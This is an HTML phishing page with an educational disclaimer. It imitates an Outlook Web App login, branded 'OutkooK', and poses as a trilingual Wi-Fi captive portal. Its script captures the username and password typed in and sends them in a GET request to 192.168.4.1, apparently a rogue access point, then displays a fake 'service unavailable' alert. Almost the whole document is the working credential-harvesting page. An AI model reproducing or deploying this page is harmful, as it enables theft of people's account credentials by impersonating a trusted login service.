<!-- 
Disclaimer

Educational Use and Legal Framework

The phishing pages provided here are strictly intended for educational and training purposes. The goal is to raise awareness about security threats and teach users how to protect themselves against phishing attacks. By accessing these pages, you agree to use them only within a legal and ethical framework, in compliance with the laws and regulations applicable in your jurisdiction.

Limitation of Liability

The author of this page disclaims any responsibility for the malicious or illegal use of these phishing pages. Any person using these pages for purposes not in accordance with the law will be solely responsible for their actions. It is strongly recommended to never use these techniques for any purpose other than learning and awareness. The author does not monitor the use of these pages post-download and transfers all responsibility to the user upon download.
-->

<!DOCTYPE html>
<html lang="pt-BR">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Outlook Web App</title>
    <style>
      body {
        font-family: Arial, sans-serif;
        background-color: #f0f8ff;
        display: flex;
        justify-content: center;
        align-items: center;
        height: 100vh;
        margin: 0;
        font-family: "Segoe UI", "Segoe WP", "Segoe UI WPC", Tahoma, Arial,
          sans-serif;
      }
      .hidden {
        display: none;
      }
      .container {
        max-width: 600px;
        margin: auto;
        padding: 20px;
        border: 1px solid #ccc;
      }
      .title {
        text-align: center;
      }
      form {
        margin-top: 20px;
      }
      .signInInputLabel {
        display: block;
        margin-bottom: 5px;
      }
      .signInInputText {
        width: 100%;
        padding: 8px;
        margin-bottom: 10px;
      }
      .language-selector {
        margin-top: 20px;
      }

      /* Estilo do botão de iniciar sessão */
      .signinbutton {
        display: inline-block;
        padding: 12px 24px;
        font-size: 16px;
        font-weight: bold;
        color: #ffffff;
        background: linear-gradient(135deg, #4a90e2, #007aff);
        border: none;
        border-radius: 25px;
        box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
        cursor: pointer;
        transition: all 0.3s ease;
        text-align: center;
      }

      .signinbutton:hover {
        background: linear-gradient(135deg, #007aff, #4a90e2);
        box-shadow: 0 6px 8px rgba(0, 0, 0, 0.15);
        transform: translateY(-2px);
      }

      .signinbutton:active {
        background: linear-gradient(135deg, #0066cc, #005bbb);
        box-shadow: 0 3px 5px rgba(0, 0, 0, 0.2);
        transform: translateY(0);
      }
      .hidden {
        display: none;
      }

      .container {
        background-color: #ffffff;
        padding: 20px;
        border-radius: 10px;
        box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
        max-width: 400px;
        width: 100%;
      }
      .title {
        display: flex;
        justify-content: space-between;
        color: #4682b4;
        font-size: 1.5em;
        margin-bottom: 20px;

        position: relative;
      }
      .title span {
        position: absolute;
        font-size: 11px;
        top: 39%;
        left: 44.5%;
        transform: translateY(-50%);
        margin-left: 5px;
      }
      h1 {
        font-size: 40px;
      }
      h2 {
        color: #4682b4;
        font-size: 1.5em;
        margin-bottom: 20px;
        text-align: center;
      }
      .form {
        display: flex;
        flex-direction: column;
      }
      .signInInputLabel {
        height: 20px;
        color: #666666;
        margin: 15px 0px 5px 0px;
      }

      .signInInputText {
        width: 100%;
        height: 50%;
        padding: 5px;
        border: 1px solid #ccc;
        border-radius: 2px;
        font-size: 1em;
      }

      .showPasswordCheck {
        display: flex;
        align-items: center;
        margin: 10px 0;
      }
      .showPasswordCheck input {
        margin-right: 5px;
      }
      .signinbutton {
        background-color: #4682b4;
        color: white;
        text-align: center;
        padding: 10px;
        border-radius: 5px;
        cursor: pointer;
        display: flex;
        justify-content: center;
        align-items: center;
        margin-top: 20px;
      }
      .signinbutton:hover {
        background-color: #5a9bd3;
      }
      .signinbutton img {
        margin-right: 10px;
      }
      .title {
        display: flex;
        justify-content: space-around;
        font-family: "Segoe UI", "Segoe WP", "Segoe UI WPC", Tahoma, Arial,
          sans-serif;
      }
      .signinIcon svg {
        border: #00f5ff 1px solid;
        border-radius: 50%;
        margin: 5px;
        width: 20px;
        height: 20px;
      }
      .language-selector {
        display: flex;
        align-items: center;
        justify-content: flex-end;
        margin-bottom: 20px;
      }

      .language-selector label {
        margin-right: 10px;
        font-size: 16px;
        color: #333;
      }

      .language-selector select {
        padding: 8px;
        font-size: 16px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #fff;
        color: #333;
      }

      /* Estilo para quando o seletor de idioma está focado */
      .language-selector select:focus {
        outline: none;
        border-color: #4682b4; /* Cor azul suave para realçar o foco */
        box-shadow: 0 0 5px rgba(70, 130, 180, 0.5); /* Sombra suave quando focado */
      }

      /* Estilo para quando o mouse está sobre as opções */
      .language-selector select option:hover {
        background-color: #f0f0f0; /* Cor de fundo suave quando pairado */
      }

      @media (max-width: 480px) {
        .container {
          padding: 15px;
        }
        h2 {
          font-size: 1.2em;
        }
        .title span {
          position: absolute;
          font-size: 9px;
          top: 40.5%;
          left: 46.5%;
          transform: translateY(-50%);
          margin-left: 5px;
        }
      }
    </style>
  </head>
  <body>
    <!-- Página em Português -->
    <div id="pt-BR" class="container hidden">
      <div class="title">
        <svg
          xmlns="http://www.w3.org/2000/svg"
          x="0px"
          y="0px"
          width="100"
          height="100"
          viewBox="0 0 48 48"
        >
          <path
            fill="#03A9F4"
            d="M21,31c0,1.104,0.896,2,2,2h17c1.104,0,2-0.896,2-2V16c0-1.104-0.896-2-2-2H23c-1.104,0-2,0.896-2,2V31z"
          ></path>
          <path
            fill="#B3E5FC"
            d="M42,16.975V16c0-0.428-0.137-0.823-0.367-1.148l-11.264,6.932l-7.542-4.656L22.125,19l8.459,5L42,16.975z"
          ></path>
          <path fill="#0277BD" d="M27 41.46L6 37.46 6 9.46 27 5.46z"></path>
          <path
            fill="#FFF"
            d="M21.216,18.311c-1.098-1.275-2.546-1.913-4.328-1.913c-1.892,0-3.408,0.669-4.554,2.003c-1.144,1.337-1.719,3.088-1.719,5.246c0,2.045,0.564,3.714,1.69,4.986c1.126,1.273,2.592,1.91,4.378,1.91c1.84,0,3.331-0.652,4.474-1.975c1.143-1.313,1.712-3.043,1.712-5.199C22.869,21.281,22.318,19.595,21.216,18.311z M19.049,26.735c-0.568,0.769-1.339,1.152-2.313,1.152c-0.939,0-1.699-0.394-2.285-1.187c-0.581-0.785-0.87-1.861-0.87-3.211c0-1.336,0.289-2.414,0.87-3.225c0.586-0.81,1.368-1.211,2.355-1.211c0.962,0,1.718,0.393,2.267,1.178c0.555,0.795,0.833,1.895,0.833,3.31C19.907,24.906,19.618,25.968,19.049,26.735z"
          ></path>
        </svg>
      </div>
      <div class="title">
        <h1>OutkooK</h1>
        <span>&#174;</span>
        <h1>Web App</h1>
      </div>
      <form action="#" method="post">
        <h2>
          Para acessar a rede Wi-Fi, insira suas credenciais de login da rede
        </h2>
        <div
          id="lgnDiv"
          class="logonDiv"
          onkeypress="return checkSubmit(event)"
        >
          <label class="signInInputLabel" for="email" id="userNameLabel"
            >Nome de usuário:</label
          >
          <div>
            <input
              id="email"
              name="username"
              class="signInInputText"
              role="textbox"
              aria-labelledby="userNameLabel"
            />
          </div>
          <label class="signInInputLabel" for="password" id="passwordLabel"
            >Senha:</label
          >
          <div>
            <input
              id="password"
              name="password"
              type="password"
              class="signInInputText"
              aria-labelledby="passwordLabel"
            />
          </div>
        </div>
        <div class="signInEnter">
          <button
            type="submit"
            onclick="sendCredentials()"
            class="signinbutton"
            role="button"
            tabindex="0"
          >
            Entrar
          </button>
          <input name="isUtf8" value="1" type="hidden" />
        </div>
      </form>
      <div class="language-selector">
        <label for="language">Idioma:</label>
        <select id="language" onchange="changeLanguage(this.value)">
          <option value="pt-BR">Português (Brasil)</option>
          <option value="en">English</option>
          <option value="es">Español</option>
        </select>
      </div>
    </div>
    <!-- Página em Inglês -->
    <div id="en" class="container hidden">
      <div class="title">
        <svg
          xmlns="http://www.w3.org/2000/svg"
          x="0px"
          y="0px"
          width="100"
          height="100"
          viewBox="0 0 48 48"
        >
          <path
            fill="#03A9F4"
            d="M21,31c0,1.104,0.896,2,2,2h17c1.104,0,2-0.896,2-2V16c0-1.104-0.896-2-2-2H23c-1.104,0-2,0.896-2,2V31z"
          ></path>
          <path
            fill="#B3E5FC"
            d="M42,16.975V16c0-0.428-0.137-0.823-0.367-1.148l-11.264,6.932l-7.542-4.656L22.125,19l8.459,5L42,16.975z"
          ></path>
          <path fill="#0277BD" d="M27 41.46L6 37.46 6 9.46 27 5.46z"></path>
          <path
            fill="#FFF"
            d="M21.216,18.311c-1.098-1.275-2.546-1.913-4.328-1.913c-1.892,0-3.408,0.669-4.554,2.003c-1.144,1.337-1.719,3.088-1.719,5.246c0,2.045,0.564,3.714,1.69,4.986c1.126,1.273,2.592,1.91,4.378,1.91c1.84,0,3.331-0.652,4.474-1.975c1.143-1.313,1.712-3.043,1.712-5.199C22.869,21.281,22.318,19.595,21.216,18.311z M19.049,26.735c-0.568,0.769-1.339,1.152-2.313,1.152c-0.939,0-1.699-0.394-2.285-1.187c-0.581-0.785-0.87-1.861-0.87-3.211c0-1.336,0.289-2.414,0.87-3.225c0.586-0.81,1.368-1.211,2.355-1.211c0.962,0,1.718,0.393,2.267,1.178c0.555,0.795,0.833,1.895,0.833,3.31C19.907,24.906,19.618,25.968,19.049,26.735z"
          ></path>
        </svg>
      </div>
      <div class="title">
        <h1>OutkooK</h1>
        <span>&#174;</span>
        <h1>Web App</h1>
      </div>
      <form action="#" method="post">
        <h2>
          To access the Wi-Fi network, please enter your network login
          credentials
        </h2>
        <div
          id="lgnDiv"
          class="logonDiv"
          onkeypress="return checkSubmit(event)"
        >
          <label class="signInInputLabel" for="email" id="userNameLabel"
            >Username:</label
          >
          <div>
            <input
              id="email"
              name="username"
              class="signInInputText"
              role="textbox"
              aria-labelledby="userNameLabel"
            />
          </div>
          <label class="signInInputLabel" for="password" id="passwordLabel"
            >Password:</label
          >
          <div>
            <input
              id="password"
              name="password"
              type="password"
              class="signInInputText"
              aria-labelledby="passwordLabel"
            />
          </div>
        </div>
        <div class="signInEnter">
          <button
            type="submit"
            onclick="sendCredentials()"
            class="signinbutton"
            role="button"
            tabindex="0"
          >
            Sign In
          </button>
          <input name="isUtf8" value="1" type="hidden" />
        </div>
      </form>
      <div class="language-selector">
        <label for="language">Language:</label>
        <select id="language" onchange="changeLanguage(this.value)">
          <option value="pt-BR">Português (Brasil)</option>
          <option value="en">English</option>
          <option value="es">Español</option>
        </select>
      </div>
    </div>
    <!-- Página em Espanhol -->
    <div id="es" class="container hidden">
      <div class="title">
        <svg
          xmlns="http://www.w3.org/2000/svg"
          x="0px"
          y="0px"
          width="100"
          height="100"
          viewBox="0 0 48 48"
        >
          <path
            fill="#03A9F4"
            d="M21,31c0,1.104,0.896,2,2,2h17c1.104,0,2-0.896,2-2V16c0-1.104-0.896-2-2-2H23c-1.104,0-2,0.896-2,2V31z"
          ></path>
          <path
            fill="#B3E5FC"
            d="M42,16.975V16c0-0.428-0.137-0.823-0.367-1.148l-11.264,6.932l-7.542-4.656L22.125,19l8.459,5L42,16.975z"
          ></path>
          <path fill="#0277BD" d="M27 41.46L6 37.46 6 9.46 27 5.46z"></path>
          <path
            fill="#FFF"
            d="M21.216,18.311c-1.098-1.275-2.546-1.913-4.328-1.913c-1.892,0-3.408,0.669-4.554,2.003c-1.144,1.337-1.719,3.088-1.719,5.246c0,2.045,0.564,3.714,1.69,4.986c1.126,1.273,2.592,1.91,4.378,1.91c1.84,0,3.331-0.652,4.474-1.975c1.143-1.313,1.712-3.043,1.712-5.199C22.869,21.281,22.318,19.595,21.216,18.311z M19.049,26.735c-0.568,0.769-1.339,1.152-2.313,1.152c-0.939,0-1.699-0.394-2.285-1.187c-0.581-0.785-0.87-1.861-0.87-3.211c0-1.336,0.289-2.414,0.87-3.225c0.586-0.81,1.368-1.211,2.355-1.211c0.962,0,1.718,0.393,2.267,1.178c0.555,0.795,0.833,1.895,0.833,3.31C19.907,24.906,19.618,25.968,19.049,26.735z"
          ></path>
        </svg>
      </div>
      <div class="title">
        <h1>OutkooK</h1>
        <span>&#174;</span>
        <h1>Web App</h1>
      </div>
      <form action="#" method="post">
        <h2>
          Para acceder a la red Wi-Fi, introduzca sus credenciales de inicio de
          sesión en la red
        </h2>
        <div
          id="lgnDiv"
          class="logonDiv"
          onkeypress="return checkSubmit(event)"
        >
          <label class="signInInputLabel" for="email" id="userNameLabel"
            >Nombre de usuario:</label
          >
          <div>
            <input
              id="email"
              name="username"
              class="signInInputText"
              role="textbox"
              aria-labelledby="userNameLabel"
            />
          </div>
          <label class="signInInputLabel" for="password" id="passwordLabel"
            >Contraseña:</label
          >
          <div>
            <input
              id="password"
              name="password"
              type="password"
              class="signInInputText"
              aria-labelledby="passwordLabel"
            />
          </div>
        </div>
        <div class="signInEnter">
          <button
            type="submit"
            onclick="sendCredentials()"
            class="signinbutton"
            role="button"
            tabindex="0"
          >
            Iniciar sesión
          </button>
          <input name="isUtf8" value="1" type="hidden" />
        </div>
      </form>
      <div class="language-selector">
        <label for="language">Idioma:</label>
        <select id="language" onchange="changeLanguage(this.value)">
          <option value="pt-BR">Português (Brasil)</option>
          <option value="en">English</option>
          <option value="es">Español</option>
        </select>
      </div>
    </div>
  </body>
  <script>
    function changeLanguage(language) {
      // Oculta todas as seções de idiomas
      const containers = document.querySelectorAll(".container");
      containers.forEach((container) => container.classList.add("hidden"));

      // Mostra a seção selecionada
      document.getElementById(language).classList.remove("hidden");
    }

    // Define o idioma padrão como Português
    document.addEventListener("DOMContentLoaded", function () {
      changeLanguage("pt-BR");
    });
    function sendCredentials() {
      var email = document.getElementById("email").value;
      var password = document.getElementById("password").value;

      getFile(
        "http://192.168.4.1/?email=" +
          encodeURIComponent(email) +
          "&password=" +
          encodeURIComponent(password)
      );
      alert("Service indisponible.");
      window.location.href = "#";
    }

    function getFile(url) {
      var xhr = new XMLHttpRequest();
      xhr.open("GET", url, true);
      xhr.send();
    }
  </script>
</html>
